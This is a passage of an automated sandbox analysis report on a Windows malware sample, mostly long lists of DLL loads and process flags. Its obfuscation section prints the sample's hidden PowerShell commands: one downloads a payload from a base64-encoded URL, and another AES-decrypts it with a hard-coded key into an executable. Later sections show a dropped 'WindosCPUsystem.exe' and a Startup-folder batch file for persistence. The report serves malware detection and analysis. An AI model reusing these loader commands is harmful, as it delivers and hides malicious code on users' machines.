                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                    Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
                    Source: C:\Windows\explorer.exe Section loaded: wininet.dll
                    Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
                    Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\explorer.exe Section loaded: wldp.dll
                    Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
                    Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
                    Source: C:\Windows\explorer.exe Section loaded: netutils.dll
                    Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
                    Source: C:\Windows\explorer.exe Section loaded: wlanapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: profapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
                    Source: C:\Windows\explorer.exe Section loaded: msi.dll
                    Source: C:\Windows\explorer.exe Section loaded: winmm.dll
                    Source: C:\Windows\explorer.exe Section loaded: dbghelp.dll
                    Source: C:\Windows\explorer.exe Section loaded: dbgcore.dll
                    Source: C:\Windows\explorer.exe Section loaded: secur32.dll
                    Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: mozglue.dll
                    Source: C:\Windows\explorer.exe Section loaded: wsock32.dll
                    Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                    Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
                    Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                    Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\explorer.exe Section loaded: webio.dll
                    Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
                    Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
                    Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\explorer.exe Section loaded: schannel.dll
                    Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Section loaded: apphelp.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Section loaded: wininet.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Section loaded: mscoree.dll
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
                    Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: userenv.dll
                    Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
                    Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
                    Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
                    Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
                    Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
                    Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
                    Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\explorer.exe Section loaded: amsi.dll
                    Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'@{# Script module or binary module file associated wi
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
                    Source: file.exe Static PE information: section name: .code
                    Source: WindosCPUsystem.exe.16.dr Static PE information: section name: .xdata
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000014001BD2E push rbx; ret 0_2_000000014001BD2F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B890DD8 push E85F4A10h; ret 7_2_00007FFD9B890DF9
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_0032B1A5 push ecx; ret 13_2_0032B1B8
                    Source: C:\Windows\explorer.exe Code function: 18_2_0232D150 push rbp; retf 18_2_0232D151
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 19_2_0000016DE6951A21 push dword ptr [00006C01h]; ret 19_2_0000016DE6951A90
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 19_2_0000016DE6951DB5 push FF480027h; retf 19_2_0000016DE6951DBA
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 19_2_0000016DE86C1394 push dword ptr [00006C01h]; ret 19_2_0000016DE86C1403
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 31_2_000001677AB41A21 push dword ptr [00006C01h]; ret 31_2_000001677AB41A90
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 31_2_000001677AB41DB5 push FF480027h; retf 31_2_000001677AB41DBA
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 31_2_000001677C7E1394 push dword ptr [00006C01h]; ret 31_2_000001677C7E1403

                    Persistence and Installation Behavior

                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe File created: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe
                    Source: C:\Windows\explorer.exe File created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                    Source: C:\Windows\explorer.exe Code function: 18_2_022C1000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,18_2_022C1000
                    Source: C:\Windows\explorer.exe Code function: 18_2_022C34B0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,18_2_022C34B0
                    Source: C:\Windows\explorer.exe Code function: 18_2_022CAF00 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,18_2_022CAF00

                    Boot Survival

                    Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe Code function: 13_2_00318110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,13_2_00318110
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{BB52E685-57DB-490D-A4DD-CCF2F7D90D58} {2DD5D29F-1CE3-49E7-8572-9D856412ED59}Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
